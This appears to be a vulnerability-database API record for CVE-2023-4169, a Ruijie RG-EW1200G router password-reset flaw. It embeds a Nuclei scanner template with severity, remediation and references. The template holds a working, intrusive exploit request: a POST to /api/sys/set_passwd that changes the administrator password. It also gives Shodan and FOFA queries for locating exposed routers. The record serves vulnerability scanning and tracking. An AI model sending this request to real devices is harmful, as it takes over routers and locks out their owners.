{"_links":{"capec":{"href":"/api/v1/vulnerability/cve-2023-4169/capec"},"cvss":{"href":"/api/v1/vulnerability/cve-2023-4169/cvss"},"cwe":{"href":"/api/v1/vulnerability/cve-2023-4169/cwe"},"enrichment":{"href":"/api/v1/vulnerability/cve-2023-4169/enrichment"},"gcve":{"href":"/api/v1/vulnerability/cve-2023-4169/gcve"},"self":{"href":"/api/v1/vulnerability/cve-2023-4169"},"sightings":{"href":"/api/v1/sightings/cve-2023-4169"}},"data":{"nuclei":true,"nuclei_template":"http/cves/2023/CVE-2023-4169.yaml","nuclei_template_severity":"high","nuclei_template_yaml":"id: CVE-2023-4169\n\ninfo:\n  name: Ruijie RG-EW1200G Router - Password Reset\n  author: DhiyaneshDK\n  severity: high\n  description: |\n    A vulnerability was found in Ruijie RG-EW1200G 1.0(1)B1P5. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /api/sys/set_passwd of the component Administrator Password Handler. The manipulation leads to improper access controls. The attack can be launched remotely.\n  impact: |\n    Authenticated low-privilege attackers can reset the administrator password through /api/sys/set_passwd endpoint due to improper access controls, allowing complete takeover of the Ruijie RG-EW1200G router.\n  remediation: |\n    Update Ruijie RG-EW1200G firmware to a version newer than 1.0(1)B1P5 that implements proper authorization checks requiring administrator privileges for password reset operations.\n  reference:\n    - https://nvd.nist.gov/vuln/detail/CVE-2023-4169\n    - https://github.com/blakespire/repoforcve/tree/main/RG-EW1200G\n    - https://vuldb.com/?ctiid.236185\n    - https://vuldb.com/?id.236185\n    - https://github.com/20142995/sectool\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 8.8\n    cve-id: CVE-2023-4169\n    cwe-id: CWE-284,NVD-CWE-noinfo\n    epss-score: 0.4923\n    epss-percentile: 0.98846\n    cpe: cpe:2.3:o:ruijie:rg-ew1200g_firmware:1.0\\(1\\)b1p5:*:*:*:*:*:*:*\n  metadata:\n    max-request: 1\n    vendor: ruijie\n    product: rg-ew1200g_firmware\n    shodan-query: http.html:\"app.2fe6356cdd1ddd0eb8d6317d1a48d379.css\"\n    fofa-query: body=\"app.2fe6356cdd1ddd0eb8d6317d1a48d379.css\"\n  tags: cve,cve2023,ruijie,router,intrusive,vkev,vuln\nvariables:\n  password: \"{{rand_base(8)}}\"\n\nhttp:\n  - method: POST\n    path:\n      - \"{{BaseURL}}/api/sys/set_passwd\"\n\n    body: |\n      {\n      \"username\":\"web\",\n      \"admin_new\":\"{{password}}\"\n      }\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - '\"result\":\"ok\"'\n\n      - type: word\n        part: header\n        words:\n          - application/json\n\n      - type: status\n        status:\n          - 200\n# digest: 490a00463044022067f8fcdb46f7f6a650b438925fb30ab0640bce2b425dbfa2b1f98f2f5014883902201ae37251b8a9dd623c7f112c13e59991174c422bb9cf931df7fe7518d101065b:922c64590222798bb761d5b6d8e72950"},"source":"nuclei","vuln_id":"cve-2023-4169"}